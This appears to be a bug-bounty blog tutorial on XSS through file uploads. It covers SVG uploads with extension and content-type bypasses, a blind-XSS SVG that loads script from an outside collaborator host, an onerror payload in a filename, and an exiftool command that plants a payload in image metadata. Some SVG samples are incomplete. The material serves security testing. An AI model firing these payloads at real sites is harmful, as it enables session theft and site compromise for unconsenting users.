Hello amazing hunters, Today i want to notice 4 ways to find xss in file upload that i found all of them in bug bounty programs or pentest programs. Let’s play this game…
This is my favorite one that leads an attacker to upload an SVG file by XSS payload. For this scenario I have some recommendations for you to bypass some filters automatically.
First of all , upload your file by .png extension and capture it in burp suite then change it to .svg that leads you to bypass client extinction checker and if the uploader checks the content-type the of file, you are able to bypass it at same time.
Second, Use magic bytes first of your file that depends on your type file.
You can use some bypass for an extension for example, You can use null bytes: XSS.svg%00.png or you can use # , ; , ? , etc: XSS.svg#.png
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
2. Blind XSS via SVG
All the number 1 bypasses are same here, The only difference is the payload, I recommend you to use this payload.<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
<!-- Script linked from the outside-->
<script xlink:href="https://xxxx.burpcollaborator" />
3. XSS via Filename
Sometimes our file name reflects on page after upload and you can inject some payload like XSS, SQL, S.S.T.I , C.S.T.I in file name then upload it. Be careful of some points, after uploading the file completely your payload runs. Sometimes during uploading your file name fire but after save page or submit message your payload does not reflect anymore. And other users like you have access to the page (same story as self-xss)'"><img src=x onerror=alert("M7.Arman")>.png
4. XSS via Metadata
Sometimes when you upload a picture or pdf , etc. these file have some metadata that must be removed by uploading file. To test this scenario, Download this picture and upload it in this site that returns you some decryption. By exiftool you can inject some metadata to your file, After injecting a payload to your picture, Upload it to the vulnerability site if return any alert for you…. HAPPY HUNTINGexiftool -Artist=’ “><img src=1 onerror=alert(document.domain)>’ Exif.jpeg